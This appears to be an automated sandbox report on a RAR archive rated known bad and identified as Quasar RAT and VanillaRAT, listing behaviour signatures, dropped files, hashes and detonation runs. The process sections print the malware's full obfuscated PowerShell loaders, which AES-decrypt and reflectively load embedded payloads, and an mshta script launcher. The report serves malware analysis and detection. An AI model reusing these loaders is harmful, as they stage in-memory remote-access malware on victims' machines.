Analysis Overview
SHA256
6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa
Threat Level: Known bad
The file Password_Is_MadeByBKA.rar was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Vanilla Rat payload
Quasar payload
Suspicious use of NtCreateProcessExOtherParentProcess
Quasar RAT
Vanillarat family
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Checks BIOS information in registry
Indicator Removal: Clear Windows Event Logs
Deletes itself
Executes dropped EXE
Hide Artifacts: Hidden Window
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Program crash
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-18 13:35
Signatures
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Vanillarat family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win7-20240729-en
Max time kernel
18s
Max time network
18s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2336 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe |
| PID 2336 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe |
| PID 2336 wrote to memory of 2372 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
Network
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10-20240404-en
Max time kernel
60s
Max time network
19s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2284 created 592 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
| PID 2284 created 592 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2284 set thread context of 3432 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 2284 set thread context of 4544 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 2284 set thread context of 1048 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 2284 set thread context of 1592 | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{23c621aa-c62a-4f76-a3f3-8649b062a849}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e83bb8f9-a68a-4d3d-86e9-ad9c86c68f3f}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{575ae588-542b-4055-8c53-3889cbfc47d9}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{7f946606-f3f4-4359-8927-7cef8af0882f}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{2c584f31-3b18-4797-aa2d-cf346a1045a5}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{4c2587e7-63b4-4603-8c1e-fc8da29766c3}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{73526fce-b2c6-443a-9feb-27e802959c79}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.211.222.173.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | f7722b62b4014e0c50adfa9d60cafa1c |
| SHA1 | f31c17e0453f27be85730e316840f11522ddec3e |
| SHA256 | ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa |
| SHA512 | 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbn1qp2l.tbv.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Windows\$sxr-mshta.exe
| MD5 | 98447a7f26ee9dac6b806924d6e21c90 |
| SHA1 | a67909346a56289b7087821437efcaa51da3b083 |
| SHA256 | c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed |
| SHA512 | c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b |
C:\Windows\$sxr-cmd.exe
| MD5 | 94912c1d73ade68f2486ed4d8ea82de6 |
| SHA1 | 524ab0a40594d2b5f620f542e87a45472979a416 |
| SHA256 | 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9 |
| SHA512 | f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d |
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win11-20240802-en
Max time kernel
60s
Max time network
55s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5276 created 2804 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 1308 created 6060 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
